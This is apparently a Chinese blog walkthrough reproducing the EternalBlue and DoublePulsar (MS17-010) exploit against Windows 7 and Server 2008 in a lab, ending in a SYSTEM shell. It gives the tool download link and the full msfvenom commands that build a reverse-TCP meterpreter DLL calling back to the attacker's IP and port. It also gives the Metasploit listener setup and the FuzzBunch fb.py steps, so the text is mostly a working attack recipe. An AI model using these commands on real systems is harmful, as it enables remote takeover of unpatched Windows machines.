E+D:eternalblue+Doublepulsar
靶机:192.168.6.39(windows server 2008 与windows 7测试过,没有问题)
攻击机:192.168.6.42
参考链接
http://www.duorenwei.com/news/5316.html
https://www.t00ls.net/viewthread.php?tid=39343&highlight=%E6%96%B9%E7%A8%8B%E5%BC%8F
工具的下载地址:http://pan.baidu.com/s/1dEYJQaH 密码:v5cj
利用说明:
本次实验首先执行脚本攻击,对目标IP、端口、系统版本等进行设置,接下来生成恶意的dll文件,并使用脚本加载它,最终达到实验目的。
主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议
在pentestbox下运行
1、实现交互端口
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42
监听本地端口并且生成一个.dll的文件。本地主机的IP地址是192.168.6.42,监听的端口是6666。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.6.42 lport=6666 -f dll -o E:\1\111.dll
2、设置本地监听的端口
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.6.42
set lport 6666
run
在cmd中,即python的根目录下实现:
shadowbroker是方程式工具
E:\Install\work\python_2.6.6>python E:\1\shadowbroker\shadowbroker\windows\fb.py
先进行测试
use Eternalblue
fb Special (Eternalblue) > use Doublepulsar
填上payload的地址
一直回车直到出现运行成功为止;
来到监听的端口,是上面的2的过程,查看,进入meterpreter下面,运行shell。进入远程服务器,这里是2008系统。
whoami查看,获得了system权限。
windows sever 2003测试失败
工具的利用方式--成功
E+D:eternalblue+Doublepulsar相关推荐
- linux运行fuzzbunch,方程式0day ETERNALBLUE复现之Empire ampamp; Msfconsole下的she...
在本文中我将为大家复现在前段时间被曝出的,方程式0day Eternalblue的利用过程.Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞.从涵盖的操作 ...
- 微软EternalBlue永恒之蓝漏洞攻击测试
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/7939 ...
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellco ...
- 2021-08-26 网安实验-Windows系统渗透测试之EternalBlue漏洞利用复现
Metasploit :是一款开源的安全漏洞检测工具. fb工具目录:Shadow Brokers 公布的NSA方程式组织黑客工具包Windows部分工具,里面包含了IIS6.0.445端口.3389 ...
- 反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历
反黑风暴·记一次遭遇 SSDP DDoS 和 EternalBlue(永恒之蓝)攻击经历 前言 故事一:SSDP DDoS 故事二:EternalBlue(永恒之蓝) 总结 参考 作者:高玉涵 时间: ...
- 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)
一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...
- MS17-010漏洞复现(x32)以及分析
复现可以使用两种方式 1.ShadowBroker释放的NSA工具 2.kali的Metasploit 第一种网上有很多教程 https://www.freebuf.com/sectool/13207 ...
- 永恒之蓝MS17-010
永恒之蓝MS17-010 实验概述 Ms17-010漏洞又称永恒之蓝漏洞,自从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了"明星".在过去的五 ...
- linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...
最新文章
- 每日记载内容总结50
- Hadoop之mapreduce 实例三
- 返回值_关于GWLP_WNDPROC的那些奇怪的返回值
- OpenCv 金字塔之上采样与下采样
- 解决iIntelliJ IDEA导入jstl后,jsp中taglib指令无法自动添加uri地址
- 裁剪图像周围空白区域_零基础PS纠正倾斜的图像效果
- 推荐 | 8 个 SpringBoot 精选项目
- Jiaozi帮忙买的Secret Garden的票拿到了,谢谢Jiaozi
- java中静态代码块的用法 static用法详解
- pcb只开窗不镀锡_FPC、PCB和FFC的关系和区别-美好精密
- 【hortonworks/registry】registry 如何创建 互相依赖的 schema
- Chronicle 已死,凶手是谷歌!
- 温故js系列(11)-BOM
- 新增的表单元素 结构伪类选择器
- Linux静态库、动态库的制作
- c语言编程 scant,C语言编程练习章.doc
- 易语言在线播放器源码php,易语言写出自绘播放器列表
- 从WORD中取出图片(复制或者另存为)后变模糊了,变得不清楚
- 2022-01-05 网工基础(十九)NAT基本原理与配置
- 学习笔记(01):3华为工程师 ,带你实战C++(2018版)-09面向对象的思想实战